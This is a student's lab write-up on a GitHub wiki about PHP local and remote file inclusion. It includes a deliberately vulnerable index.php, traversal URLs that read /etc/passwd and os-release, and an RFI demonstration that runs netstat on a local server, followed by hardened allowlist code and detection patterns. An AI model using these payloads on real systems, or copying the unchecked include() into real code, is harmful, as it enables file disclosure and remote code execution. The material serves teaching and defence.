Lab 2.2 File Inclusion Vulnerabilities - Zacham17/my-tech-journal GitHub Wiki

Creating a PHP Environment

  1. I created an index.php file to serve as a simple testing page. It contains the following code (the unchecked include() of the page parameter is the vulnerability studied in this lab):

```php
<a href="index.php?page=page1.html"><button>page1</button></a><br/>
<a href="index.php?page=page2.html"><button>page2</button></a><br/>
<a href="index.php?page=page3.html"><button>page3</button></a><br/>
<?php
// Read the page name straight from the query string (null if absent).
$page = $_GET['page'] ?? null;
echo "<div>";
if(isset($page))
{
  // Vulnerable: the user-controlled value goes to include() unchecked, so it
  // can name any local file (LFI) or, with allow_url_include=On, a URL (RFI).
  include("$page");
}
else
{
  echo "<p>select a page</p>";
}
echo "</div>";
?>
```
  2. I also created three simple HTML files with placeholder content, called page1.html, page2.html, and page3.html.
  • Note that all of these files, including index.php, are in the same directory, so the page parameter is a path relative to that directory.
  3. The php -S command starts an ad hoc web server that interprets PHP code.
  • php -S 127.0.0.1:9000 listens on the loopback address on port 9000 and serves the directory it is started in as the document root.
  4. Browsing to 127.0.0.1:9000/index.php opens the index.php page. Its three buttons navigate to page 1, page 2, and page 3, each of which loads the associated HTML file through the page parameter.

Local File Inclusion

When a button is clicked to navigate to page 1, 2, or 3, the URL changes to reflect this. An example of the URL when on page 1 is shown in the screenshot below.

[screenshot: URL bar showing index.php?page=page1.html]

There is a vulnerability here: because the page parameter is passed straight to include(), the URL can be manipulated to show the contents of files that were never meant to be reachable from the web page. For example, 127.0.0.1:9000/index.php?page=../../../etc/passwd displays the contents of /etc/passwd. The path is resolved relative to the directory the server was started in, so enough ../ segments are needed to reach the filesystem root; extra ones are harmless, since .. at / stays at /. The image below shows what the URL looks like in the URL bar.

[screenshot: URL bar showing index.php?page=../../../etc/passwd]

That is the Local File Inclusion (LFI) vulnerability: an attacker can read any file the web server process has permission to read. Another example is 127.0.0.1:9000/index.php?page=../../../etc/os-release, which shows the contents of the os-release file and so reveals the operating system and version of the host running the web server. Because include() also executes any PHP code in the file it loads, LFI is not limited to information disclosure when the attacker can influence the contents of a local file.

Remote File Inclusion Setup

I took the following steps to set up an environment to test remote file inclusion:

  • Create an HTML file called rfi.html containing placeholder content.
  • Copy the php.ini file into the directory containing all the other file inclusion files.
    • Note: On my system, I had to copy php.ini from /etc/php/8.1/cli/php.ini. php -S is the CLI SAPI, so it reads the CLI php.ini rather than the Apache or FPM one.

  • Set the "allow_url_include" flag to "On" in the copied php.ini. This only takes effect if allow_url_fopen is also On (the default). allow_url_include is Off by default and has been deprecated since PHP 7.4, which is why a real RFI normally requires a misconfigured server.
  • Restart the ad hoc web server with php -S 127.0.0.1:9000 -c php.ini so that it loads the modified configuration.

Remote File Inclusion Execution

  • To simulate the attacker's remote system, I used the command python -m http.server 8000 to start a second HTTP server on port 8000.
  • To include the rfi.html file, I entered the following URL: 127.0.0.1:9000/index.php?page=http://127.0.0.1:8000/rfi.html
    • The screenshot below shows the rfi.html file being included: [screenshot]
  • This shows that files can be pulled in from another host through remote file inclusion. If the remotely fetched file contains PHP code, include() executes that code on the web server, which gives an attacker remote code execution. Note that the attacker's server must serve the PHP source verbatim, as python's http.server does; a server that executed the PHP itself would send only its output. For example, I was able to run the netstat command on the target web server by performing remote file inclusion of an rfi.php file that I made, containing the code shown in the screenshot below:

[screenshot: contents of rfi.php]

  • The code shown above executes the netstat command.
  • Using the URL 127.0.0.1:9000/index.php?page=http://127.0.0.1:8000/rfi.php, I had the target web server fetch the file and execute it, which ran the command on the target. The result is shown below:

[screenshot: netstat output rendered by the target web server]
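As an added example that is not part of the original lab, the following is a hardened replacement for the include("$page") in index.php that closes both the LFI hole from the Local File Inclusion section and the RFI hole demonstrated here. It assumes PHP 8.0 or later (for str_starts_with and str_contains) and that the page files have been moved into a pages/ subdirectory; the function names resolve_page and classify_page are my own. The allowlist alone is the fix: exact matching refuses ../../../etc/passwd and http://127.0.0.1:8000/rfi.php, and it also refuses wrapper schemes the lab does not cover (php://filter, data://) without needing to know about them. The realpath() check is defence in depth, and classify_page only labels refused requests so they stand out in the server log.

```php
<?php
// Added example (not from the original lab): a hardened index.php for the
// file inclusion page. Two independent controls:
//   1. an allowlist of page names, so the request can only select known files;
//   2. a realpath() containment check as defence in depth, so even a name that
//      slipped past the allowlist could not leave the pages directory.
// The "pages/" subdirectory and the page list are assumptions for this example.
// Requires PHP 8.0+ (str_starts_with / str_contains).

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['page1.html', 'page2.html', 'page3.html'];

/**
 * Resolve a user-supplied page name to an absolute path, or return null if
 * the request must be refused. The raw $_GET value never reaches include().
 */
function resolve_page(string $page): ?string
{
    // Control 1: exact allowlist match. Rejects "../../../etc/passwd",
    // "http://127.0.0.1:8000/rfi.php", "php://filter/..." and similar in one go.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }

    // Control 2: the resolved file must still live inside PAGES_DIR.
    // realpath() collapses "..", follows symlinks and returns false if the
    // file does not exist; the prefix check catches a symlink that points
    // outside the directory.
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . DIRECTORY_SEPARATOR . $page);
    if ($base === false || $real === false
        || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $real;
}

/** Classify a refused request for logging: which attack it looks like. */
function classify_page(string $page): string
{
    // Any URL scheme (http://, ftp://, php://, data://, phar:// ...) is an RFI
    // or wrapper attempt; include() would otherwise treat it as a stream.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $page)) {
        return 'remote-url';
    }
    // Parent-directory segments or NUL bytes indicate path traversal (LFI).
    if (str_contains($page, '..') || str_contains($page, "\0")) {
        return 'traversal';
    }
    return in_array($page, ALLOWED_PAGES, true) ? 'ok' : 'unknown-page';
}

// Request handling, mirroring the structure of the lab's index.php.
echo '<a href="index.php?page=page1.html"><button>page1</button></a><br/>';
echo '<a href="index.php?page=page2.html"><button>page2</button></a><br/>';
echo '<a href="index.php?page=page3.html"><button>page3</button></a><br/>';

$page = $_GET['page'] ?? null;
echo "<div>";
if ($page === null) {
    echo "<p>select a page</p>";
} elseif (($path = resolve_page($page)) !== null) {
    include $path;
} else {
    // Refuse and record why; the reason string is what a detection rule keys on.
    http_response_code(400);
    error_log('refused page=' . $page . ' reason=' . classify_page($page));
    echo "<p>unknown page</p>";
}
echo "</div>";
```

Run it the same way as the lab server (php -S 127.0.0.1:9000 from the directory containing index.php) and the three payloads from this page return 400 with a reason in the server log instead of file contents or netstat output. Unlike a denylist of ../ or http://, the allowlist does not have to anticipate every encoding or stream wrapper, which is why it is the control to rely on and the path check is only a backstop.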

Conclusion

Local File Inclusion and Remote File Inclusion are both serious vulnerabilities: LFI discloses any file the web server process can read, and RFI (or LFI of content the attacker controls) gives code execution, which can lead to further compromise of the system. This document provided one demonstration of each. Both stem from the same root cause, passing untrusted input to include(), and the fix is to restrict the parameter to a fixed set of known pages rather than to sanitise paths.
